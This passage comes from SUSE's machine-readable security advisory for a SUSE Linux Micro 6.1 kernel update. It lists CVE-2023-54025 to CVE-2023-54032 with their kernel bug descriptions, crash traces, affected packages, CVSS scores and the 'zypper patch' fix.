"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54025",
"url": "https://www.suse.com/security/cve/CVE-2023-54025"
},
{
"category": "external",
"summary": "SUSE Bug 1255558 for CVE-2023-54025",
"url": "https://bugzilla.suse.com/1255558"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54025"
},
{
"cve": "CVE-2023-54026",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54026"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nopp: Fix use-after-free in lazy_opp_tables after probe deferral\n\nWhen dev_pm_opp_of_find_icc_paths() in _allocate_opp_table() returns\n-EPROBE_DEFER, the opp_table is freed again, to wait until all the\ninterconnect paths are available.\n\nHowever, if the OPP table is using required-opps then it may already\nhave been added to the global lazy_opp_tables list. The error path\ndoes not remove the opp_table from the list again.\n\nThis can cause crashes later when the provider of the required-opps\nis added, since we will iterate over OPP tables that have already been\nfreed. E.g.:\n\n Unable to handle kernel NULL pointer dereference when read\n CPU: 0 PID: 7 Comm: kworker/0:0 Not tainted 6.4.0-rc3\n PC is at _of_add_opp_table_v2 (include/linux/of.h:949\n drivers/opp/of.c:98 drivers/opp/of.c:344 drivers/opp/of.c:404\n drivers/opp/of.c:1032) -\u003e lazy_link_required_opp_table()\n\nFix this by calling _of_clear_opp_table() to remove the opp_table from\nthe list and clear other allocated resources. While at it, also add the\nmissing mutex_destroy() calls in the error path.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54026",
"url": "https://www.suse.com/security/cve/CVE-2023-54026"
},
{
"category": "external",
"summary": "SUSE Bug 1255549 for CVE-2023-54026",
"url": "https://bugzilla.suse.com/1255549"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54026"
},
{
"cve": "CVE-2023-54027",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54027"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\niio: core: Prevent invalid memory access when there is no parent\n\nCommit 813665564b3d (\"iio: core: Convert to use firmware node handle\ninstead of OF node\") switched the kind of nodes to use for label\nretrieval in device registration. Probably an unwanted change in that\ncommit was that if the device has no parent then NULL pointer is\naccessed. This is what happens in the stock IIO dummy driver when a\nnew entry is created in configfs:\n\n # mkdir /sys/kernel/config/iio/devices/dummy/foo\n BUG: kernel NULL pointer dereference, address: ...\n ...\n Call Trace:\n __iio_device_register\n iio_dummy_probe\n\nSince there seems to be no reason to make a parent device of an IIO\ndummy device mandatory, let\u0027s prevent the invalid memory access in\n__iio_device_register when the parent device is NULL. With this\nchange, the IIO dummy driver works fine with configfs.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54027",
"url": "https://www.suse.com/security/cve/CVE-2023-54027"
},
{
"category": "external",
"summary": "SUSE Bug 1255579 for CVE-2023-54027",
"url": "https://bugzilla.suse.com/1255579"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54027"
},
{
"cve": "CVE-2023-54030",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54030"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nio_uring/net: don\u0027t overflow multishot recv\n\nDon\u0027t allow overflowing multishot recv CQEs, it might get out of\nhand, hurt performance, and in the worst case scenario OOM the task.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54030",
"url": "https://www.suse.com/security/cve/CVE-2023-54030"
},
{
"category": "external",
"summary": "SUSE Bug 1255691 for CVE-2023-54030",
"url": "https://bugzilla.suse.com/1255691"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.3,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "low"
}
],
"title": "CVE-2023-54030"
},
{
"cve": "CVE-2023-54031",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54031"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nvdpa: Add queue index attr to vdpa_nl_policy for nlattr length check\n\nThe vdpa_nl_policy structure is used to validate the nlattr when parsing\nthe incoming nlmsg. It will ensure the attribute being described produces\na valid nlattr pointer in info-\u003eattrs before entering into each handler\nin vdpa_nl_ops.\n\nThat is to say, the missing part in vdpa_nl_policy may lead to illegal\nnlattr after parsing, which could lead to OOB read just like CVE-2023-3773.\n\nThis patch adds the missing nla_policy for vdpa queue index attr to avoid\nsuch bugs.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54031",
"url": "https://www.suse.com/security/cve/CVE-2023-54031"
},
{
"category": "external",
"summary": "SUSE Bug 1255583 for CVE-2023-54031",
"url": "https://bugzilla.suse.com/1255583"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54031"
},
{
"cve": "CVE-2023-54032",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54032"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: fix race when deleting quota root from the dirty cow roots list\n\nWhen disabling quotas we are deleting the quota root from the list\nfs_info-\u003edirty_cowonly_roots without taking the lock that protects it,\nwhich is struct btrfs_fs_info::trans_lock. This unsynchronized list\nmanipulation may cause chaos if there\u0027s another concurrent manipulation\nof this list, such as when adding a root to it with\nctree.c:add_root_to_dirty_list().\n\nThis can result in all sorts of weird failures caused by a race, such as\nthe following crash:\n\n [337571.278245] general protection fault, probably for non-canonical address 0xdead000000000108: 0000 [#1] PREEMPT SMP PTI\n [337571.278933] CPU: 1 PID: 115447 Comm: btrfs Tainted: G W 6.4.0-rc6-btrfs-next-134+ #1\n [337571.279153] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.14.0-0-g155821a1990b-prebuilt.qemu.org 04/01/2014\n [337571.279572] RIP: 0010:commit_cowonly_roots+0x11f/0x250 [btrfs]\n [337571.279928] Code: 85 38 06 00 (...)\n [337571.280363] RSP: 0018:ffff9f63446efba0 EFLAGS: 00010206\n [337571.280582] RAX: ffff942d98ec2638 RBX: ffff9430b82b4c30 RCX: 0000000449e1c000\n [337571.280798] RDX: dead000000000100 RSI: ffff9430021e4900 RDI: 0000000000036070\n [337571.281015] RBP: ffff942d98ec2000 R08: ffff942d98ec2000 R09: 000000000000015b\n [337571.281254] R10: 0000000000000009 R11: 0000000000000001 R12: ffff942fe8fbf600\n [337571.281476] R13: ffff942dabe23040 R14: ffff942dabe20800 R15: ffff942d92cf3b48\n [337571.281723] FS: 00007f478adb7340(0000) GS:ffff94349fa40000(0000) knlGS:0000000000000000\n [337571.281950] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n [337571.282184] CR2: 00007f478ab9a3d5 CR3: 000000001e02c001 CR4: 0000000000370ee0\n [337571.282416] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n [337571.282647] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\n [337571.282874] Call Trace:\n [337571.283101] \u003cTASK\u003e\n [337571.283327] ? __die_body+0x1b/0x60\n [337571.283570] ? die_addr+0x39/0x60\n [337571.283796] ? exc_general_protection+0x22e/0x430\n [337571.284022] ? asm_exc_general_protection+0x22/0x30\n [337571.284251] ? commit_cowonly_roots+0x11f/0x250 [btrfs]\n [337571.284531] btrfs_commit_transaction+0x42e/0xf90 [btrfs]\n [337571.284803] ? _raw_spin_unlock+0x15/0x30\n [337571.285031] ? release_extent_buffer+0x103/0x130 [btrfs]\n [337571.285305] reset_balance_state+0x152/0x1b0 [btrfs]\n [337571.285578] btrfs_balance+0xa50/0x11e0 